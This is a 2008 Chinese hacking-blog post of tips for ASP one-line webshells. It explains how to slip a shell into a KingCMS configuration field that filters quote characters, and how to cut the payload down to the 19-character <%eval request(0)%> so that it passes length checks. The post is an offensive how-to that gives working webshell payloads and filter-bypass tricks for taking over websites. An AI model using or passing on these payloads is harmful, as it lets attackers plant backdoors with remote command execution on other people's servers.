返回首页

asp一句话的一些tips

时间:2008-11-03 来源:安全叶子技术小组 作者: 点击:
关于一句话的tips可能各位在网上看的多了,什么变形,变两句话,变三句话,变四句话.............吃多了........ 一句话的字符数一般最少为24个字节,其实可以更少,有时我们在插马的时候可能会遇到过滤了'和等字符,还可能有字符限制,这里我就和大家一起YY一下~~ 上
  
关于一句话的tips可能各位在网上看的多了,什么变形,变两句话,变三句话,变四句话.............吃多了........

一句话的字符数一般最少为24个字节,其实可以更少,有时我们在插马的时候可能会遇到过滤了“'”和“"”等字符,还可能有字符限制,这里我就和大家一起YY一下~~

上次别人问的kingcms拿shell方法就涉及到了“绕”的东西,具体讨论贴在:http://00day.cn/forum/read.php?tid=892

有兴趣的可以去看看,这个系统主要是过滤了单引号和双引号,我们来看一段他要插入的文件的部分:

.............................................
top="安全叶子技术小组"
timeout=3000
.............................................

如果我们要从top项目哪里绕,显然是非常困难的,因为程序过滤了单引号和双引号,一般一句话木马是这样写的“<%execute request("l")%>”.

这样显然是执行不了的,就算能执行,要闭合掉前面的“"”也是一件令人费解的事情

所以我们只能把希望寄托给timeout,因为这个项目不需要我们去想闭合的事情,聪明的朋友应该会想到这样来插马“<%execute request(chr(42))%>”

但是如果程序有字符数限制呢?我们只能尽可能的减少字符,很多朋友会认为“<%execute request(chr(42))%>”这样已经是最精简的了,其实不然

我们可以这样写“<%execute(request(0))%>”,连接密码为“0”

怎么?还不够少?还可以这样写“<%eval request(0)%>”仅仅为19个字符,一般程序编写的限制都为20个字符,这样的形式就能绕过其验证了

“<%eval request(0)%>”这种形式还能绕过一其他的一些验证,具体就要看情况了。
------分隔线----------------------------
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
推荐内容